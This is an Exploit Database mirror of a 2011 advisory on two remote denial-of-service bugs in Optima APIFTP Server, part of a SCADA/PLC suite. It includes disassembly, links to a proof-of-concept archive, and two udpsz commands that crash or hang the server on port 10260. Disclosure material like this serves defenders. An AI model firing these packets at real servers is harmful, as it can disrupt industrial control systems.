optima apiftp server 1.5.2.13 – Multiple Vulnerabilities

• Exploit Database
• 33 阅读

• 作者： Luigi Auriemma
  日期： 2011-11-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18112/

• #######################################################################
  
   Luigi Auriemma
  
  Application:Optima APIFTP Server
  http://www.optimalog.com/home.html
  Versions: <= 1.5.2.13
  Platforms:Windows
  Bugs: A] NULL pointer
  B] endless loop
  Exploitation: remote
  Date: 13 Nov 2011
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bugs
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  Optima is a suite of automation software for controlling PLC via
  SCADA/HMI interface.
  APIFTP Server is a file server for working with remote files located on
  shared folders.
  
  
  #######################################################################
  
  =======
  2) Bugs
  =======
  
  ---------------
  A] NULL pointer
  ---------------
  
  NULL pointer exploitable through too long path names.
  The effect is the displaying of a MessageBox with the error and the
  continuing of the execution that will lead to a stack exaustion after
  some seconds and the termination of the server.
  
  
  ---------------
  B] endless loop
  ---------------
  
  Endless loop with CPU at 100% caused by incomplete packets:
  
  004A9C93 8B03 /MOV EAX,DWORD PTR DS:[EBX]
  004A9C95 8B80 78010000|MOV EAX,DWORD PTR DS:[EAX+178]
  004A9C9B 2D B80B0000|SUB EAX,0BB8 ; Switch (cases BB8..BE0)
  004A9CA0 74 19|JE SHORT APIFTPSe.004A9CBB
  004A9CA2 83E8 14|SUB EAX,14
  004A9CA5 74 47|JE SHORT APIFTPSe.004A9CEE
  004A9CA7 83E8 0A|SUB EAX,0A
  004A9CAA 0F84 9D000000|JE APIFTPSe.004A9D4D
  004A9CB0 83E8 0A|SUB EAX,0A
  004A9CB3 0F84 CA000000|JE APIFTPSe.004A9D83
  004A9CB9^EB D8|JMP SHORT APIFTPSe.004A9C93
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip
  
  A]
  udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107
  
  wait some seconds, the tool will quit automatically
  
  B]
  udpsz -C "e803 0400 00" -T -D SERVER 10260 -1
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################